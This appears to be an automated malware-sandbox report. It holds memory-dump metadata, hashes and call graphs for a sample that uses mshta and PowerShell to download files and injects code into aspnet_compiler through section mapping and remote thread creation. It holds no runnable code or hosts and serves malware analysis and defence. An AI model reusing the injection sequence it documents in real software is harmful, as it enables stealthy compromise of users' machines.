                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Reset < >
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000003.422625272.0000000002B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_3_2b10000_mshta.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                    • Instruction ID: b5d79dc445a2ea3836a881e7d65dee896a16e8a4fc648040a2542fed1d6a8b75
                                                                                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000003.422625272.0000000002B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_3_2b10000_mshta.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                    • Instruction ID: b5d79dc445a2ea3836a881e7d65dee896a16e8a4fc648040a2542fed1d6a8b75
                                                                                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000003.422625272.0000000002B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_3_2b10000_mshta.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                    • Instruction ID: b5d79dc445a2ea3836a881e7d65dee896a16e8a4fc648040a2542fed1d6a8b75
                                                                                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000003.422625272.0000000002B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_3_2b10000_mshta.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                    • Instruction ID: b5d79dc445a2ea3836a881e7d65dee896a16e8a4fc648040a2542fed1d6a8b75
                                                                                                                                                    • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:5.6%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:50%
                                                                                                                                                    Total number of Nodes:6
                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                    execution_graph 1955 7fe899d4b18 1957 7fe899d5a40 URLDownloadToFileW 1955->1957 1958 7fe899d5b10 1957->1958 1951 7fe899d59f1 1953 7fe899d5a01 URLDownloadToFileW 1951->1953 1954 7fe899d5b10 1953->1954

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.456015998.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_7fe899d0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DownloadFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1407266417-0
                                                                                                                                                    • Opcode ID: bcfb1e74fcf7742f089bf512aafac9124be0ed2888a45b259f191703e97c766a
                                                                                                                                                    • Instruction ID: c82ea7dbb3ebd60acc30cd737cc27368bef6bb37f0b5b88c33ac0d542fbc1396
                                                                                                                                                    • Opcode Fuzzy Hash: bcfb1e74fcf7742f089bf512aafac9124be0ed2888a45b259f191703e97c766a
                                                                                                                                                    • Instruction Fuzzy Hash: 45319131918A5C8FDB59DF5CD8857B9B7E1FB69711F00822ED04ED3661CB70A8158B81

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.456015998.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_7fe899d0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DownloadFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1407266417-0
                                                                                                                                                    • Opcode ID: 687041d381776ff91d67ea2cc655d11f462eef6b51ef3bdd1838ccf531e88737
                                                                                                                                                    • Instruction ID: 12c0e95903fbaf63b5ccd2c230ba1c2dd23ed54b55ce1596b740c8660b335a9d
                                                                                                                                                    • Opcode Fuzzy Hash: 687041d381776ff91d67ea2cc655d11f462eef6b51ef3bdd1838ccf531e88737
                                                                                                                                                    • Instruction Fuzzy Hash: B241F57081DB989FDB5ADB589C847B9BBF4FB56321F04826FD08DD7162CB246806C782

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 26 7fe89aa26e9-7fe89aa2799 27 7fe89aa2c7d-7fe89aa2d36 26->27 28 7fe89aa279f-7fe89aa27a9 26->28 29 7fe89aa27ab-7fe89aa27b8 28->29 30 7fe89aa27c2-7fe89aa27c9 28->30 29->30 32 7fe89aa27ba-7fe89aa27c0 29->32 33 7fe89aa27cb-7fe89aa27de 30->33 34 7fe89aa27e0 30->34 32->30 35 7fe89aa27e2-7fe89aa27e4 33->35 34->35 38 7fe89aa2bf8-7fe89aa2c02 35->38 39 7fe89aa27ea-7fe89aa27f6 35->39 40 7fe89aa2c15-7fe89aa2c25 38->40 41 7fe89aa2c04-7fe89aa2c14 38->41 39->27 42 7fe89aa27fc-7fe89aa2806 39->42 46 7fe89aa2c27-7fe89aa2c2b 40->46 47 7fe89aa2c32-7fe89aa2c7c 40->47 43 7fe89aa2808-7fe89aa2815 42->43 44 7fe89aa2822-7fe89aa2832 42->44 43->44 48 7fe89aa2817-7fe89aa2820 43->48 44->38 53 7fe89aa2838-7fe89aa286c 44->53 46->47 48->44 53->38 58 7fe89aa2872-7fe89aa287e 53->58 58->27 59 7fe89aa2884-7fe89aa288e 58->59 60 7fe89aa28a7-7fe89aa28ac 59->60 61 7fe89aa2890-7fe89aa289d 59->61 60->38 62 7fe89aa28b2-7fe89aa28b7 60->62 61->60 63 7fe89aa289f-7fe89aa28a5 61->63 62->38 64 7fe89aa28bd-7fe89aa28c2 62->64 63->60 64->38 66 7fe89aa28c8-7fe89aa28d7 64->66 67 7fe89aa28d9-7fe89aa28e3 66->67 68 7fe89aa28e7 66->68 69 7fe89aa28e5 67->69 70 7fe89aa2903-7fe89aa298e 67->70 71 7fe89aa28ec-7fe89aa28f9 68->71 69->71 78 7fe89aa2990-7fe89aa299b 70->78 79 7fe89aa29a2-7fe89aa29c4 70->79 71->70 73 7fe89aa28fb-7fe89aa2901 71->73 73->70 78->79 80 7fe89aa29c6-7fe89aa29d0 79->80 81 7fe89aa29d4 79->81 82 7fe89aa29f0-7fe89aa2a7e 80->82 83 7fe89aa29d2 80->83 84 7fe89aa29d9-7fe89aa29e6 81->84 91 7fe89aa2a80-7fe89aa2a8b 82->91 92 7fe89aa2a92-7fe89aa2ab0 82->92 83->84 84->82 86 7fe89aa29e8-7fe89aa29ee 84->86 86->82 91->92 93 7fe89aa2ac0 92->93 94 7fe89aa2ab2-7fe89aa2abc 92->94 97 7fe89aa2ac5-7fe89aa2ad3 93->97 95 7fe89aa2add-7fe89aa2b6d 94->95 96 7fe89aa2abe 94->96 104 7fe89aa2b81-7fe89aa2bda 95->104 105 7fe89aa2b6f-7fe89aa2b7a 95->105 96->97 97->95 98 7fe89aa2ad5-7fe89aa2adb 97->98 98->95 108 7fe89aa2be2-7fe89aa2bf7 104->108 105->104
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.456369272.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_7fe89aa0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d8260e1420f318c641d7984cbd7c422ddbb3dc0fb94a71d5362b4c13426fbb2c
                                                                                                                                                    • Instruction ID: c7efe70f39e6684f7684e75548806400f788e2b1e72a5ec52e7c77f2fab8c2b0
                                                                                                                                                    • Opcode Fuzzy Hash: d8260e1420f318c641d7984cbd7c422ddbb3dc0fb94a71d5362b4c13426fbb2c
                                                                                                                                                    • Instruction Fuzzy Hash: 1422F53090CB894FE75ADB2C84546687FE2FF9A354F2441EAD48EC72A3DA24AC65C741

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 109 7fe89aa0f0d-7fe89aa0f96 111 7fe89aa1098-7fe89aa10dc 109->111 112 7fe89aa0f9c-7fe89aa0fa6 109->112 119 7fe89aa10ed-7fe89aa1124 111->119 120 7fe89aa10de-7fe89aa10e7 111->120 113 7fe89aa0fa8-7fe89aa0fb5 112->113 114 7fe89aa0fbf-7fe89aa0fee 112->114 113->114 116 7fe89aa0fb7-7fe89aa0fbd 113->116 114->111 125 7fe89aa0ff4-7fe89aa0ffe 114->125 116->114 123 7fe89aa112a-7fe89aa119e 119->123 124 7fe89aa11c1-7fe89aa11cb 119->124 120->119 143 7fe89aa11a6-7fe89aa11be 123->143 126 7fe89aa11d8-7fe89aa11e8 124->126 127 7fe89aa11cd-7fe89aa11d7 124->127 128 7fe89aa1017-7fe89aa1077 125->128 129 7fe89aa1000-7fe89aa100d 125->129 130 7fe89aa11ea-7fe89aa11ee 126->130 131 7fe89aa11f5-7fe89aa121a 126->131 140 7fe89aa1079-7fe89aa1084 128->140 141 7fe89aa108b-7fe89aa1097 128->141 129->128 133 7fe89aa100f-7fe89aa1015 129->133 130->131 133->128 140->141 143->124
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.456369272.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_7fe89aa0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 50d6adeb58cfff0ade5c8111bba157a57cfb34e974b1e8f283145c061c648695
                                                                                                                                                    • Instruction ID: 1e131bf71cac016db1fb57f5a81e296047e5a775e561ec87d04a2e6bfed5ef44
                                                                                                                                                    • Opcode Fuzzy Hash: 50d6adeb58cfff0ade5c8111bba157a57cfb34e974b1e8f283145c061c648695
                                                                                                                                                    • Instruction Fuzzy Hash: F5A1E220A0DBC90FE347973C58646647FE1EF47258B2941EBD48ECB1B3D9189C5AC362
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.456369272.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_7fe89aa0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 13d550dca1401d92a503d49512f35e8490a9c0bf93f754fb3f77cef97593a648
                                                                                                                                                    • Instruction ID: 0b31f4367620205d1fb792eb76084a8582a53384f24efc9fc93274ccd4b9f071
                                                                                                                                                    • Opcode Fuzzy Hash: 13d550dca1401d92a503d49512f35e8490a9c0bf93f754fb3f77cef97593a648
                                                                                                                                                    • Instruction Fuzzy Hash: CB31AF1061DBC90FE757933858606A47FE1EF47260B1E01DBD099CB1B3C9189D5AC3A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000003.477230430.0000000003260000.00000010.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_3_3260000_mshta.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                    • Instruction ID: c8d40cfe0b62005e8c39ce72b230dcf46e269f9eea56edb68369dc5eba22f392
                                                                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000003.477230430.0000000003260000.00000010.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_3_3260000_mshta.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                    • Instruction ID: c8d40cfe0b62005e8c39ce72b230dcf46e269f9eea56edb68369dc5eba22f392
                                                                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000003.477230430.0000000003260000.00000010.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_3_3260000_mshta.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                    • Instruction ID: c8d40cfe0b62005e8c39ce72b230dcf46e269f9eea56edb68369dc5eba22f392
                                                                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000003.477230430.0000000003260000.00000010.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_3_3260000_mshta.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                    • Instruction ID: c8d40cfe0b62005e8c39ce72b230dcf46e269f9eea56edb68369dc5eba22f392
                                                                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:8.9%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:52.9%
                                                                                                                                                    Total number of Nodes:68
                                                                                                                                                    Total number of Limit Nodes:2
                                                                                                                                                    execution_graph 1996 402d65 1997 402d69 1996->1997 1998 4018a6 8 API calls 1997->1998 1999 402ea5 1997->1999 1998->1999 2004 401706 2005 4016ea 2004->2005 2007 401789 2005->2007 2008 4017b4 2007->2008 2011 40328d 2008->2011 2010 4017e8 2010->2005 2013 40323d 2011->2013 2014 40327d 2011->2014 2012 4032a1 Sleep 2012->2013 2013->2011 2013->2012 2013->2014 2014->2010 2100 4018b1 2101 4018b5 2100->2101 2102 401903 2100->2102 2104 4018ee Sleep 2101->2104 2103 4014bf 7 API calls 2102->2103 2105 40191a 2102->2105 2103->2105 2104->2102 2043 4014d6 2044 4014c4 2043->2044 2045 40156f NtDuplicateObject 2044->2045 2053 40168b 2044->2053 2046 40158c NtCreateSection 2045->2046 2045->2053 2047 4015b2 NtMapViewOfSection 2046->2047 2048 40160c NtCreateSection 2046->2048 2047->2048 2049 4015d5 NtMapViewOfSection 2047->2049 2050 401638 2048->2050 2048->2053 2049->2048 2051 4015f3 2049->2051 2052 401642 NtMapViewOfSection 2050->2052 2050->2053 2051->2048 2052->2053 2054 401669 NtMapViewOfSection 2052->2054 2054->2053 1992 402f5d 1993 4030b4 1992->1993 1994 402f87 1992->1994 1994->1993 1995 403042 RtlCreateUserThread NtTerminateProcess 1994->1995 1995->1993 1966 402dfe 1967 402dee 1966->1967 1969 402ea5 1967->1969 1970 4018a6 1967->1970 1971 4018b7 1970->1971 1972 4018ee Sleep 1971->1972 1973 401903 1972->1973 1975 40191a 1973->1975 1976 4014bf 1973->1976 1975->1969 1977 4014ce 1976->1977 1978 40156f NtDuplicateObject 1977->1978 1980 40168b 1977->1980 1979 40158c NtCreateSection 1978->1979 1978->1980 1981 4015b2 NtMapViewOfSection 1979->1981 1982 40160c NtCreateSection 1979->1982 1980->1975 1981->1982 1983 4015d5 NtMapViewOfSection 1981->1983 1982->1980 1984 401638 1982->1984 1983->1982 1987 4015f3 1983->1987 1984->1980 1985 401642 NtMapViewOfSection 1984->1985 1985->1980 1986 401669 NtMapViewOfSection 1985->1986 1986->1980 1987->1982 2106 4018be 2107 4018b7 2106->2107 2108 4018ee Sleep 2107->2108 2109 401903 2108->2109 2110 4014bf 7 API calls 2109->2110 2111 40191a 2109->2111 2110->2111 2112 4016be 2113 4016d3 2112->2113 2114 401789 Sleep 2113->2114 2114->2113 1988 4030bf 1989 403055 RtlCreateUserThread NtTerminateProcess 1988->1989 1991 4030d1 1988->1991 1990 4030b4 1989->1990 1991->1991

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 30 401874-40187f 20->30 31 401886-4018a3 call 401164 20->31 21->22 29 40156f-401586 NtDuplicateObject 21->29 22->20 29->22 32 40158c-4015b0 NtCreateSection 29->32 30->31 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->22 38 401638-40163c 35->38 37->35 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->35 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                                                                                                                                                    APIs
                                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1652636561-0
                                                                                                                                                    • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                                                    • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                                                                                                                    • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                                                    • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 77 401874-40187f 67->77 78 401886-4018a3 call 401164 67->78 68->69 76 40156f-401586 NtDuplicateObject 68->76 69->67 76->69 79 40158c-4015b0 NtCreateSection 76->79 77->78 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->69 85 401638-40163c 82->85 84->82 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->82 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                                                                                                                                                    APIs
                                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1546783058-0
                                                                                                                                                    • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                                                    • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                                                                                                                    • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                                                    • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 120 401874-40187f 110->120 121 401886-4018a3 call 401164 110->121 111->112 119 40156f-401586 NtDuplicateObject 111->119 112->110 119->112 122 40158c-4015b0 NtCreateSection 119->122 120->121 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->112 128 401638-40163c 125->128 127->125 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->125 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                                                                                                                                                    APIs
                                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1546783058-0
                                                                                                                                                    • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                                                    • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                                                                                                                    • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                                                    • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 160 401874-40187f 150->160 161 401886-4018a3 call 401164 150->161 151->152 159 40156f-401586 NtDuplicateObject 151->159 152->150 159->152 162 40158c-4015b0 NtCreateSection 159->162 160->161 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->152 168 401638-40163c 165->168 167->165 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->165 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                                                                                                                                                    APIs
                                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
